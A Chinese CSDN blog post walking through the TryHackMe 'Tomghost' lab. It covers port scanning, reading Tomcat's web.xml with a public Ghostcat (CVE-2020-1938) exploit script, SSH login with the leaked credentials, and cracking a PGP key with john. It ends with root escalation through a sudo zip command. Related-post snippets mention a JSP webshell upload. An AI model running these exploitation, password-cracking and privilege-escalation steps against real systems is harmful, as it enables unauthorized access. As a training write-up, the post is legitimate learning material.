CTF靶机 Tomghost 笔记

最新推荐文章于 2023-12-27 21:54:32 发布
最新推荐文章于 2023-12-27 21:54:32 发布
阅读量479 收藏 1
点赞数
分类专栏: Try Hack Me靶机 文章标签: 安全 信息安全 ssh linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44101248/article/details/106924072
版权

Tomghost

靶机介绍 : 识别最近的漏洞,试图利用系统或读取您不应该访问的文件
靶机标签 : Tomcat, sudo zip提权, pgp, CVE-2020-1938

目标机ip:10.10.218.159
攻击机:kali
Nmap 扫描目标机端口
开放了22,53,8009,8080端口

nmap -sV 10.10.218.159

在这里插入图片描述
访问8080端口,Apache Tomcat/9.0.30
在这里插入图片描述
在exploit-db上搜索对应CVE
在这里插入图片描述
下载EXP利用
在这里插入图片描述
下载后记得赋予执行权限

python./48143.py 10.10.218.159 -p 8009 -f WEB-INF/web.xml

注意到回显页面有一个账号密码
在这里插入图片描述
ssh登录到目标机
在这里插入图片描述进到里面先到处翻一翻
查看另一用户merlin的home目录
发现第一个第一个flag user.txt
在这里插入图片描述
skyfuck用户目录下有两个加密文件
tryhackme.asc
credential.pgp
用scp 下载文件到攻击机破解

scp skyfuck@10.10.218.159:tryhackme.asc /root/
scp skyfuck@10.10.218.159:credential.pgp /root/

在这里插入图片描述下载到kali攻击机后用gpg2john 获取tryhackme.asc 的hash

gpg2john tryhackme.asc > hash

在这里插入图片描述用jhon破解破解hash

john -w=/usr/share/wordlists/rockyou.txt hash

在这里插入图片描述用gpg 导入tryhackme.asc
会弹出一个框需要验证密码, 键入john跑出来的tryhackme.asc密码登录

gpg --import tryhackme.asc

后面解密credential.pgp的时候还需要输入一次密码
获得merlin用户的账号与密码

gpg --decrypt credential.pgp

在这里插入图片描述用ssh登录merlin用户
在这里插入图片描述先查看sudo权限
能用zip 提权
参考链接: https://gtfobins.github.io/
在这里插入图片描述

提权成功, 查看root文件

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'

在这里插入图片描述
END

z4yn:)
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-Tomcat后台弱口令漏洞利用
asd158923328的博客
08-24 2134
根据题意 进入环境,随便点击靶机链接,跳出一个登录界面,因为题目提示网站后台账号密码存在弱口令,用burpsuite爆破得到账号密码为:admin/123456 登录进去过后,发现有一个上传界面,根据解题方向上传一个war木马即可: war木马的制作过程: jsp木马源码 <% if(“023”.equals(request.getParameter(“pwd”))){ java.io...
CTF6靶机实战.zip
05-25
本压缩包“CTF6靶机实战.zip”显然是一份用于CTF比赛的学习资料,包含了实战过程、反弹shell文件以及针对特定系统版本漏洞的利用脚本。 首先,我们要理解靶机的概念。在网络安全领域,靶机是模拟真实网络环境的...
CTF综合靶机渗透
xv66666的博客
08-11 1035
虚拟机难度中等,使用ubuntu(32位),其他软件包有:PHPapacheMySQLBoot to root:从Web应用程序进入虚拟机,并获得root权限。靶机:使用VMWare打开虚机,网络连接方式设置为net,靶机自动获取IP。攻击机:同网段下有Windows攻击机,安装有Nmap、Burpsuit、Sqlmap、nc、Python2.7、DirBuster、AWVS、Nessus等渗透工具,kali攻击机,主要用Windows攻击机完成实验。ip发现启动Billu_b0x虚拟机,由于虚机网络设置为
CTF靶机 DC-3
weixin_52221158的博客
09-02 840
CTF靶场 DC-3详细讲解
Vulnhub靶机渗透之新手入门 JIS-CTF入门靶场-学习笔记
ZhangAweio的博客
04-08 2956
入门的靶机是非常适合刚入门的小伙伴,拿去练习,虽然挑战性不大,但是还是很有必要去来练习的,这个主要是考察一个很简单的渗透过程,在真实环境当中,需要我们更多的是随机应变,加油网安人,让我们一起共同进步吧!
【blueteam-ctf-challenges流量取证部分】Tomcat Takeover Blue Team Challenge
weixin_64836216的博客
11-07 182
Tomcat Takeover Blue Team Challenge 一道关于tomcat漏洞的流量分析题(一边学流量取证,一边学渗透),难度不大,适合了解打tomcat漏洞的流程,同时熟悉流量分析
我的ctf刷题wp笔记
03-25
我的ctf刷题wp笔记
CTF笔记.one
05-06
CTF笔记,注意是.one格式,里面详细记录了很多笔记,希望对各位学习有帮助!
CTF Web学习笔记
01-11
CTF Web学习笔记,包含杂项和WEB两部分,包含杂项简介,WEB知识点总结以及Web常用套路总结。
ctf笔记 杂项 web 密码学基础笔记
最新发布
07-05
ctf笔记 杂项 web 密码学基础笔记
CTF实践 靶机渗透
Radiency的博客
11-23 1457
CTF实践。通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围
内网渗透代理知识以及渗透某CTF三层靶机实例
m0_58595840的博客
01-04 1933
内网代理技术拿下某CTF三层靶机渗透
ctf靶机的安装
viviliving的专栏
10-03 2583
Kali Linux Web渗透测试手册(第二版) - 1.3 - 靶机的安装 一.配置KALI Linux和渗透测试环境 在这一章,我们将覆盖以下内容: 在Windows和Linux上安装VirtualBox 创建一个Kali Linux虚拟机 更新和升级Kali Linux 为渗透测试配置web浏览器(即在Firefox浏览器下安装一些常用的插件) 创建一个属于自己的靶机 配置网络使虚拟机正常通信 了解靶机上易受攻击的web应用程序 1.5、创建客户端虚拟机 现在,我们...
TryHackMe-M4tr1x: Exit Denied(boot2root)
M1n9K1n9的博客
04-25 711
大多数人只看到一个完美构建的系统。但你一直都是不同的。你不仅看到表面上的东西,还看到 它下面有什么统治;调节和调节的内部关联机制 几乎完美地管理其每个模块,以至于它试图隐藏所有模块 其多面设计中的微小孔。但是,这些漏洞仍然存在,不要 他们?。。。是的,你还在学习,但你最大的弱点是自我怀疑…它继续 阻止你…你知道它来自哪里吗?在内心深处,我知道你会这样做。你知道有些事情不对劲,你只是不能把手指放在上面。井 让我告诉你。你生活在梦中。一个已经放在你的 眼睛让你看不到你意识到你可以成为谁。是的。。。
零基础打靶—CTF4靶场
qq_61861243的博客
12-02 606
复制 license_info.json wa_data.dat 这两个文件到/home/acunetix/.acunetix/data/license/目录,全部替换即可。post 提交后,点击Blog,触发XSS,可以在BeEF页面,可以看到肉鸡上线,这里是本地宿主机这里使用的是本地火狐浏览器访问的,所以肉鸡为本地宿主机。尝试构建SQL注入语句,查看错误信息,order by判断字段发现6 页面报错,5页面没有报错,说明当前表有5列即5个字段。
红队打靶:LampSecurity:CTF7打靶思路详解(vulnhub)
Bossfrank的博客
06-21 1355
本文详述了vulnhub靶场LampSecurity:CTF7的详细打靶过程。打靶过程涉及到关于SQL注入、不安全的文件上传、awk字符串处理、md5哈希批量破解,密码喷射等。
HackTheBox MetaTwo 网站框架CVE获取用户shell和破解私钥提权
Ba1_Ma0的博客
11-08 1671
也能扫描到很多信息,现在我们知道这个网站的框架是WordPress,版本是5.6.2,我用searchsploitsearchsploit搜索了一下此版本的漏洞,需要登录后台才能用一个XXE的漏洞,既然是WordPress框架的,那就要用wpscan枚举一下。登录之后,我查看了当前文件夹下的所有文件,发现了passpie程序的文件夹,这个程序是用来管理密码的。这个.keys里有两个密钥,一个公钥,一个私钥,我把公钥删了,不然等一下工具用不了,然后把文件改个名。
(2024.3.6再度更新最新)一篇文章教你ctfd平台搭建&ctfd动态靶机创建&docker的使用&ctf动态flag的实现 来我这就够了!
zwy3327078581的博客
11-20 5984
ctfd 的平台搭建,维护,以及docker的使用创建下载安装,ctfd动态靶机的搭建,题目部署,题目出题模板格式等等····
网络渗透CTF实践:获取靶机Web Developer 文件/root/flag.txt中flag
yellowO的博客
12-27 4283
实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。(Dirb 是一个专门用于爆破目录的工具,在 Kali 中默认已经安装,类似工具还有国外的patator,dirsearch,DirBuster, 国内的御剑)截图。利用该插件可能存在的漏洞。pwd查看当前所在的目录,cd切换到/var/www/html目录下,ls查看当前目录下的内容,找到wp-config.php文件。
ctf5靶机 sql
07-28
抱歉,我无法回答关于CTF靶机的问题。 #### 引用[.reference_title] - *1* *3* [Vulnhub-CTF6靶机实战](https://blog.csdn.net/kengkeng123qwe/article/details/124817304)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [Vulnhub-CTF5靶机实战](https://blog.csdn.net/kengkeng123qwe/article/details/124802020)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值